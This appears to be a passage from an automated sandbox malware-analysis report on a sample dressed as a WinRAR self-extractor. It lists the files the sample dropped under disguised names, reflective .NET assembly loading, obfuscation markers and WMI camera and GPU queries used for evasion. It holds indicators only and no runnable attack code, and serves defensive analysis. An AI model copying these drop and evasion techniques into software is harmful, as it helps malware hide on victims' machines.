                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeDirectory created: C:\Program Files\Microsoft Office 15\ClientX64\9bce06a9fec5b2Jump to behavior
                                  Source: o9jDrpZrgR.exeStatic file information: File size 1622827 > 1048576
                                  Source: o9jDrpZrgR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                  Source: o9jDrpZrgR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                  Source: o9jDrpZrgR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                  Source: o9jDrpZrgR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                  Source: o9jDrpZrgR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                  Source: o9jDrpZrgR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                  Source: o9jDrpZrgR.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                  Source: o9jDrpZrgR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                  Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: o9jDrpZrgR.exe
                                  Source: o9jDrpZrgR.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                  Source: o9jDrpZrgR.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                  Source: o9jDrpZrgR.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                  Source: o9jDrpZrgR.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                  Source: o9jDrpZrgR.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                                  Data Obfuscation

                                  barindex
                                  Source: 0.3.o9jDrpZrgR.exe.6e7d70c.1.raw.unpack, 1a2.cs.Net Code: ghM System.Reflection.Assembly.Load(byte[])
                                  Source: 0.3.o9jDrpZrgR.exe.6e7d70c.1.raw.unpack, 857.cs.Net Code: _736
                                  Source: 0.3.o9jDrpZrgR.exe.657270c.0.raw.unpack, 1a2.cs.Net Code: ghM System.Reflection.Assembly.Load(byte[])
                                  Source: 0.3.o9jDrpZrgR.exe.657270c.0.raw.unpack, 857.cs.Net Code: _736
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCode function: 0_2_0089F640 push ecx; ret 0_2_0089F653
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCode function: 0_2_0089EB78 push eax; ret 0_2_0089EB96
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeCode function: 5_2_00007FF848F43CB9 push ebx; retf 5_2_00007FF848F43CBA
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeCode function: 5_2_00007FF848F5739D push ebp; retf 5_2_00007FF848F573A8
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeCode function: 5_2_00007FF848F57BAC push eax; ret 5_2_00007FF848F57BAD
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeCode function: 5_2_00007FF848F400BD pushad ; iretd 5_2_00007FF848F400C1
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeCode function: 12_2_00007FF848F4739E push ebp; retf 12_2_00007FF848F473A8
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeCode function: 12_2_00007FF848F47BAC push eax; ret 12_2_00007FF848F47BAD
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeCode function: 12_2_00007FF848F300BD pushad ; iretd 12_2_00007FF848F300C1
                                  Source: o9jDrpZrgR.exeStatic PE information: section name: .didat
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeFile created: C:\reviewruntimeMonitor\__tmp_rar_sfx_access_check_7071296Jump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile created: C:\Users\user\Desktop\ESwXjeKp.logJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile created: C:\Users\user\Desktop\lGVRPIpa.logJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile created: C:\Users\user\Desktop\SoilvDeL.logJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile created: C:\Users\user\Desktop\BhRGcQzx.logJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile created: C:\Users\user\Desktop\qtmQsFEO.logJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile created: C:\Users\user\Desktop\hLTAIczh.logJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile created: C:\Users\user\Desktop\QJNvoZJT.logJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile created: C:\Users\user\Desktop\GVjFENOl.logJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile created: C:\Users\user\Desktop\eQQkRcVr.logJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile created: C:\Users\user\Desktop\HJnNqbKj.logJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile created: C:\Users\user\Desktop\pwLIWFpU.logJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile created: C:\Users\user\Desktop\fNssmckm.logJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile created: C:\Users\user\Desktop\NBQmTGPX.logJump to dropped file
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeFile created: C:\Users\user\Desktop\vnjhvXId.logJump to dropped file
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeFile created: C:\Users\user\Desktop\egSCbkdO.logJump to dropped file
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeFile created: C:\Users\user\Desktop\MTqwIPIz.logJump to dropped file
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeFile created: C:\Users\user\Desktop\BfMGYDNR.logJump to dropped file
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeFile created: C:\Users\user\Desktop\sCEQoKxk.logJump to dropped file
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeFile created: C:\Users\user\Desktop\jTkAEhsC.logJump to dropped file
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeFile created: C:\Users\user\Desktop\eOLjNPjM.logJump to dropped file
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeFile created: C:\Users\user\Desktop\KWPomPtF.logJump to dropped file
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeFile created: C:\Users\user\Desktop\BnwYCmoX.logJump to dropped file
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeFile created: C:\Users\user\Desktop\zdaXCUIW.logJump to dropped file
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeFile created: C:\Users\user\Desktop\gRySjyoH.logJump to dropped file
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeFile created: C:\Users\user\Desktop\XieCzWia.logJump to dropped file
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeFile created: C:\Users\user\Desktop\GbOXfjDL.logJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile created: C:\Users\user\Desktop\eQQkRcVr.logJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile created: C:\Users\user\Desktop\SoilvDeL.logJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile created: C:\Users\user\Desktop\BhRGcQzx.logJump to dropped file
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeFile created: C:\Users\user\Desktop\gRySjyoH.logJump to dropped file
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeFile created: C:\Users\user\Desktop\BfMGYDNR.logJump to dropped file
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeFile created: C:\Users\user\Desktop\vnjhvXId.logJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile created: C:\Users\user\Desktop\ESwXjeKp.logJump to dropped file
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeFile created: C:\Users\user\Desktop\XieCzWia.logJump to dropped file
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeFile created: C:\Users\user\Desktop\GbOXfjDL.logJump to dropped file
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeFile created: C:\Users\user\Desktop\egSCbkdO.logJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile created: C:\Users\user\Desktop\hLTAIczh.logJump to dropped file
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeFile created: C:\Users\user\Desktop\jTkAEhsC.logJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\qBJICEqiLNwXNBLrN.exeJump to dropped file
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeFile created: C:\Users\user\Desktop\sCEQoKxk.logJump to dropped file
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeFile created: C:\Users\user\Desktop\MTqwIPIz.logJump to dropped file
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeFile created: C:\Users\user\Desktop\KWPomPtF.logJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile created: C:\Users\user\Desktop\pwLIWFpU.logJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile created: C:\Users\user\Desktop\NBQmTGPX.logJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile created: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exeJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile created: C:\Users\user\Desktop\qtmQsFEO.logJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile created: C:\Users\user\Desktop\fNssmckm.logJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile created: C:\Users\user\Desktop\lGVRPIpa.logJump to dropped file
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeFile created: C:\Users\user\Desktop\zdaXCUIW.logJump to dropped file
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeFile created: C:\Users\user\Desktop\BnwYCmoX.logJump to dropped file
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeFile created: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile created: C:\Users\user\Desktop\GVjFENOl.logJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile created: C:\Users\user\Desktop\QJNvoZJT.logJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile created: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile created: C:\Program Files (x86)\Microsoft.NET\RedistList\conhost.exeJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile created: C:\Users\user\Desktop\HJnNqbKj.logJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile created: C:\Recovery\qBJICEqiLNwXNBLrN.exeJump to dropped file
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeFile created: C:\Users\user\Desktop\eOLjNPjM.logJump to dropped file
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                                  Malware Analysis System Evasion

                                  barindex
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
